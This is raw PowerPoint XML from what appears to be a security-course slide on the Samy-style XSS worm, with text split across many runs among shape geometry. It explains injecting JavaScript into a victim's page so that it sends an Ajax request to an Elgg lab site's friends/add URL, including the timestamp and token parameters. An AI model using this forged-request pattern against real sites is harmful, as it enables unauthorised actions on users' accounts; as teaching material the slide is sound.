          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC96BD1-C9B6-1F14-B3BC-73C8AE9C2A56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2952451D-7C0E-750A-BE24-A6515FD5031C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="6472440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52400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="385064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="385064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="12192000" h="385445">
                  <a:moveTo>
                    <a:pt x="12192000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5334000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334000" y="385064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12192000" y="38506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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC2DAB9-8113-EBDC-F3E8-842D87043E34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89CB553A-5ABD-47FD-DEC4-3617D85B30A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8400" y="6464807"/>
              <a:ext cx="1467611" cy="370330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7E70A405-FEFB-C534-F834-2C9599E0AD6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5563361" y="5145786"/>
              <a:ext cx="6172200" cy="489584"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6172200" h="489585">
                  <a:moveTo>
                    <a:pt x="6172199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6170118" y="77327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6164323" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6155493" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6131433" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3126866" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113995" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102806" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3093976" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3088181" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3086099" y="489203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3084018" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078223" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3069393" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3058204" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3045333" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40766" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27895" y="232135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16706" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7876" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2081" y="7732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8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31CB07DE-DAA8-8AB3-AA44-3065EBBFF4F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657600" y="4163568"/>
              <a:ext cx="3124200" cy="1305560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3124200" h="1305560">
                  <a:moveTo>
                    <a:pt x="3124200" y="310895"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3124200" h="1305560">
                  <a:moveTo>
                    <a:pt x="3124200" y="310895"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76200" y="1305305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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE8402E-AF49-1943-FC81-C0D34FCB89FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3962400"/>
              <a:ext cx="5181600" cy="2895600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5181600" h="2895600">
                  <a:moveTo>
                    <a:pt x="5181600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2895596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181600" y="2895596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE16A10-1CAE-33CF-CE15-BEF074B49DA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3962400"/>
              <a:ext cx="5181600" cy="2895600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5181600" h="2895600">
                  <a:moveTo>
                    <a:pt x="5181600" y="2895596"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5181600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2895596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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD3D9EA-EC14-D365-0AAE-7A05A5B85D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483611" y="3300476"/>
            <a:ext cx="633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URL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CBE4B3E3-FDCF-5CF0-9847-E10CE040B7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6334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Becoming</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20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Victim’s</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>friend</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>through XSS</a:t>
            </a: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7335C76A-0719-3B84-D59E-C0BE94E9839A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="865378"/>
            <a:ext cx="6890384" cy="98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5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> need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lang="en-US" sz="1800" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>a piece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 err="1">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Javascript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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-15" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="4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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>issue</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-3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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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(Samy)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friend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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Ajax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framework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Javascript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5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>issuing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> HTTP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requests.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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA0BB94-302B-8956-9F7E-72D14F9ED19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6330061" y="2433827"/>
            <a:ext cx="5556885" cy="341630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5556884" h="341630">
                <a:moveTo>
                  <a:pt x="338328" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338328" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338328" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5556884" h="341630">
                <a:moveTo>
                  <a:pt x="2546604" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2039112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2039112" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546604" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546604" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5556884" h="341630">
                <a:moveTo>
                  <a:pt x="5556504" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4759452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4759452" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5556504" y="341376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55565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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F924F7C0-BB8B-1EC6-C407-E67A9D2D2BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268630" y="2388234"/>
            <a:ext cx="6075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http://www.xsslabelgg.com/action/friends/add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BC"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>friend=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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1030DBD7-0616-E1B2-E4FC-D0E6001389F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6656578" y="2388234"/>
            <a:ext cx="1725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720" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="9AB957"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>gg</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>ts=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7" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65367B8A-75BB-FD58-5473-D2C787E87CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8865234" y="2388234"/>
            <a:ext cx="223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720" algn="l"/>
              </a:tabLst>
            </a:pP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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E36C09"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="E26B08"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E36C09"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_token=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8" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9127FD-E469-8358-FDD4-CA92FE87B8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="210311" y="2752344"/>
            <a:ext cx="11696700" cy="554990"/>
            <a:chOff x="210311" y="2752344"/>
            <a:chExt cx="11696700" cy="554990"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD3AC95-5F1D-4F45-C4C5-C02FFB5D41A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="229361" y="2771394"/>
              <a:ext cx="5029200" cy="489584"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5029200" h="489585">
                  <a:moveTo>
                    <a:pt x="5029200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5027118" y="77327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5021323" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5012493" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4988433" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2555367" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542495" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531306" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522476" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2516681" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514600" y="489203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2512518" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2506723" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2497893" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486704" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473833" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40767" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27880" y="232135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16689" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7865" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="7732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20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5BA3FD-BCAD-7EF4-4BA4-4067EAB6433D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5296661" y="2786634"/>
              <a:ext cx="6591300" cy="501650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6591300" h="501650">
                  <a:moveTo>
                    <a:pt x="1371599" y="12191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1369518" y="89519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363723" y="156667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354893" y="209610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330833" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726566" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713695" y="269260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702506" y="303977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693676" y="356920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687881" y="424068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685800" y="501395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683718" y="424068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677923" y="356920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669093" y="303977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657904" y="269260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645033" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40766" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27895" y="244327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16706" y="209610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7876" y="156667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2081" y="89519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12191"/>
                  </a:lnTo>
                </a:path>
                <a:path w="6591300" h="501650">
                  <a:moveTo>
                    <a:pt x="3619499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3617418" y="77327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611623" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3602793" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578733" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553081" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540209" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529020" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2520190" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514395" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2512314" y="489203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510232" y="411876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504437" y="344728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2495607" y="291785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2484418" y="257068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471546" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1445894" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1433023" y="232135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421834" y="197418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413004" y="144475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407209" y="77327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405128" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="6591300" h="501650">
                  <a:moveTo>
                    <a:pt x="6591300" y="12191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6589218" y="89519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583423" y="156667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6574593" y="209610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6550533" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163693" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150821" y="269260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5139632" y="303977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130802" y="356920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5125007" y="424068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5122926" y="501395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5120844" y="424068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5115049" y="356920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5106219" y="303977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5095030" y="269260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5082159" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695318" y="256793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682447" y="244327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3671258" y="209610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3662428" y="156667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3656633" y="89519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654552" y="1219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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69E759D-9CA4-B15E-8B99-E25383C33EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5489575" y="3315080"/>
            <a:ext cx="96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Friend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2" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B987588B-7B83-BCB3-0859-D77837BF0171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285101" y="3355594"/>
            <a:ext cx="9537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Token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BA3E99CA-B752-0DA6-2AF0-AC76DF51D192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
